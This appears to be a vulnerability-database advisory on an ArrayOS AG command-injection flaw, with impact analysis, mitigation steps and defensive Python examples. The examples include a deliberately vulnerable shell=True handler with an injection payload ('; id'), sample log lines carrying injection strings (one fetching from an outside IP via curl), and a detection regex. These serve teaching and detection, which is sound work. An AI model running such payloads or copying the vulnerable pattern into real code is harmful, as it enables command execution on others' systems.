CVE-2025-66644: CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in Array Networks ArrayOS AG
Array Networks ArrayOS AG before 9.4.5.9 allows command injection, as exploited in the wild in August through December 2025.
AI Analysis
Technical Summary
CVE-2025-66644 is an OS command injection vulnerability (CWE-78, improper neutralization of special elements used in an OS command) in Array Networks ArrayOS AG, the operating system of the AG Series secure access gateways used in enterprise and telecommunications environments. Every release before 9.4.5.9 is affected. A request field that reaches an OS command line without neutralization lets the attacker append or substitute shell syntax and run arbitrary commands on the underlying system with the privileges of the process that builds the command. The attack is network-reachable and needs no user interaction, but it requires high privileges (PR:H), which in practice means an authenticated administrative account or session; the public record does not identify the injection point or the affected interface. Exploitation in the wild was observed from August through December 2025, so a working exploit exists and the precondition (administrative access, obtained through stolen or weak credentials or an exposed management plane) has been met against real deployments. The CVSS v3.1 base score is 7.2 (High). With confidentiality, integrity and availability all rated High, that is the score the network-reachable, privileged, no-interaction vector produces at unchanged scope; PR:H is what holds it down, since the same vector with low or no privileges would score 8.8 or 9.8. The record published here carries no vendor advisory or patch reference, but the version bound in the description identifies 9.4.5.9 as the first fixed release; until affected devices are on that release or later, compensating controls around administrative access are the only mitigation.
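The paragraph above describes the CWE-78 pattern only in the abstract. The Python block below is an illustration added here, not code from ArrayOS AG or Array Networks: it shows the pattern on a hypothetical appliance diagnostic endpoint that runs a network tool against a user-supplied host. The vulnerable handler concatenates the value into a shell command line; the hardened one validates the value against an allow-list and passes it as a single argv element so a shell never parses it. `echo` stands in for the real diagnostic tool, the host regex and the endpoint are assumptions, and nothing here describes the actual injection point in ArrayOS AG, which is not public.

```python
"""Generic CWE-78 illustration (constructed example, not ArrayOS code):
a hypothetical diagnostic endpoint that runs a tool against a user-supplied host."""
import re
import subprocess

# Allow-list for a host argument: hostname or IP literal characters only (assumption).
HOST_RE = re.compile(r"^[A-Za-z0-9.:\-]{1,253}$")


def run_diag_vulnerable(host: str) -> str:
    """Builds a shell command string from untrusted input (CWE-78).
    `echo` stands in for the real diagnostic tool so the example runs anywhere."""
    cmd = f"echo pinging {host}"  # the attacker controls part of a shell command line
    out = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return out.stdout


def argv_only(host: str) -> str:
    """Second defence on its own: with an argv list and shell=False the value is
    one argument to echo, so ';', '`' and '$(' are ordinary characters."""
    out = subprocess.run(["echo", "pinging", host], shell=False,
                         capture_output=True, text=True)
    return out.stdout


def run_diag_hardened(host: str) -> str:
    """Both defences: reject anything outside the allow-list, then never use a shell."""
    if not HOST_RE.fullmatch(host):
        raise ValueError(f"rejected host argument: {host!r}")
    return argv_only(host)


if __name__ == "__main__":
    payload = "127.0.0.1; id"  # constructed injection payload
    print(run_diag_vulnerable(payload))  # runs `id` as the service account
    print(argv_only(payload))  # prints the literal payload, nothing executes
    try:
        run_diag_hardened(payload)
    except ValueError as e:
        print("hardened:", e)
```

The allow-list alone is not enough in the vulnerable function: a value that passes the regex still lands inside a shell string, so any future relaxation of the pattern reopens the hole. The argv form is the defence that actually removes the shell from the path; validation on top of it limits what the underlying tool receives.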
Potential Impact
Successful exploitation gives the attacker arbitrary command execution on the appliance itself, which amounts to full compromise of the device: reading or altering its configuration, stored credentials and logs, disrupting or silently modifying the services it fronts, and using it as a foothold for lateral movement into the networks behind it. An access gateway is a particularly valuable foothold because it terminates remote-user sessions and sits in the path of their traffic, so its compromise also undermines the trust placed in every session it brokers. Organizations running a vulnerable release face operational downtime, data exposure and the cost of rebuilding a compromised edge device. The PR:H requirement is the limiting factor: the realistic threat is an attacker who already holds, or can obtain, administrative access, and a management interface reachable from untrusted networks or the internet removes most of that barrier. Given the confirmed in-the-wild exploitation, any device that ran an affected version while its management plane was exposed during that period should be treated as possibly compromised rather than merely vulnerable.
Mitigation Recommendations
1. Upgrade ArrayOS AG to 9.4.5.9 or later. That is the first release outside the affected range stated in the advisory; with exploitation confirmed in the wild, treat it as an emergency change rather than a scheduled one.
2. Until the upgrade is done, restrict the management interfaces of AG devices to a dedicated administrative network or jump host, with firewall rules and segmentation so they are not reachable from user networks or the internet. The user-facing gateway service has to stay exposed; the management plane does not.
3. Enforce strong, unique credentials and multi-factor authentication for every account with administrative privileges. PR:H means a stolen or shared admin credential is the most likely entry point.
4. Monitor device logs and traffic to and from the management plane for shell metacharacters in request parameters, command execution that no administrator initiated, new or modified accounts, and unexpected outbound connections from the appliance.
5. Tune IDS/IPS and any WAF in front of the management interface to alert on command-injection patterns, and treat hits from authenticated sessions as incidents rather than noise, since authenticated is exactly what this attacker is.
6. Inventory every AG device and its running release, and perform a compromise assessment on each one that ran an affected version while reachable between August and December 2025: compare the running configuration against a known-good baseline, review administrative accounts and authentication logs, and look for unexpected files or scheduled jobs. Rotate administrative and any stored credentials after patching, because the upgrade closes the bug but does not evict an attacker who already has persistence.
7. Keep an incident response plan that covers compromise of network-edge appliances, including how to take a gateway out of service and restore it from a clean image, so containment does not have to be improvised.
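Two of the steps above, the version bound and the log review, can be scripted. The block below is an added example, not vendor tooling: the version test encodes only the "before 9.4.5.9" range from the advisory, and the log scanner is a generic CWE-78 heuristic over constructed sample lines. The real injection point is not published, so the `/admin/diag` path, the `host` parameter and every log line here are assumptions made for illustration; the scanner should be pointed at whatever request logging the appliance or a front-end proxy actually produces.

```python
"""Defender checks for CVE-2025-66644 (added example, not Array Networks tooling).
Version bound from the advisory; endpoint, parameter and log lines are constructed."""
import re
from urllib.parse import unquote_plus

FIRST_FIXED = (9, 4, 5, 9)  # advisory: releases "before 9.4.5.9" are affected


def parse_version(text):
    """'9.4.5.8' -> (9, 4, 5, 8); rejects anything that is not four dotted integers."""
    m = re.fullmatch(r"\s*(\d+)\.(\d+)\.(\d+)\.(\d+)\s*", text)
    if not m:
        raise ValueError(f"unrecognised ArrayOS version string: {text!r}")
    return tuple(int(x) for x in m.groups())


def is_affected(version_text):
    """True when the running release is inside the advisory's affected range."""
    return parse_version(version_text) < FIRST_FIXED


# Shell syntax that has no business inside a hostname, filename or similar value.
# Values are checked after URL decoding, so %3B (;) and %60 (`) are caught as well.
INJECTION_RE = re.compile(r"[;&|`\r\n]|\$[({]")

# Combined log format: client, user, timestamp, method, path, status (assumed layout).
LOG_RE = re.compile(r'^(\S+) \S+ (\S+) \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')


def suspicious_params(path):
    """Return (name, decoded value) for query parameters carrying shell metacharacters."""
    if "?" not in path:
        return []
    hits = []
    for pair in path.split("?", 1)[1].split("&"):
        name, _, raw = pair.partition("=")
        value = unquote_plus(raw)
        if INJECTION_RE.search(value):
            hits.append((name, value))
    return hits


def scan_log(lines):
    """One finding per request parameter that looks like a command-injection attempt."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        src, user, ts, method, path, status = m.groups()
        for name, value in suspicious_params(path):
            findings.append({"src": src, "user": user, "time": ts, "method": method,
                             "path": path.split("?", 1)[0], "param": name,
                             "value": value, "status": int(status)})
    return findings


# Constructed sample lines: one benign diagnostic call, two injection attempts from
# the same authenticated admin session, one unrelated request.
SAMPLE_LOG = [
    '10.0.0.5 - admin [12/Nov/2025:10:01:13 +0000] "GET /admin/diag?host=10.0.0.9 HTTP/1.1" 200 512',
    '198.51.100.7 - admin [12/Nov/2025:10:02:44 +0000] "GET /admin/diag?host=10.0.0.9%3Bid HTTP/1.1" 200 998',
    '198.51.100.7 - admin [12/Nov/2025:10:03:01 +0000] "POST /admin/diag?host=x%60curl%20198.51.100.7%60 HTTP/1.1" 200 870',
    '10.0.0.6 - - [12/Nov/2025:10:05:00 +0000] "GET /login HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for v in ("9.4.0.77", "9.4.5.8", "9.4.5.9", "9.4.5.10"):
        print(v, "affected" if is_affected(v) else "not affected")
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['src']} user={f['user']} {f['method']} {f['path']} "
              f"{f['param']}={f['value']!r}")
```

Because the vulnerability needs high privileges, every hit will come from an authenticated session; the useful output is therefore the account and source address, which tell you which credential to revoke and which host to pivot the investigation to. A 200 status on an injection attempt is not proof of success, only of a request the application did not reject, so pair these findings with the device-side checks in step 6.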
Affected Countries
United States, China, India, Germany, United Kingdom, Japan, South Korea, France, Canada, Australia
Technical Details
- Data Version: 5.2
- Assigner Short Name: mitre
- Date Reserved: 2025-12-05T00:00:00.000Z
- CVSS Version: 3.1
- State: PUBLISHED
Threat ID: 69332bc4f88dbe026c09c124
Added to database: 12/5/2025, 7:00:20 PM
Last enriched: 2/27/2026, 6:19:50 AM
Last updated: 3/26/2026, 7:45:07 AM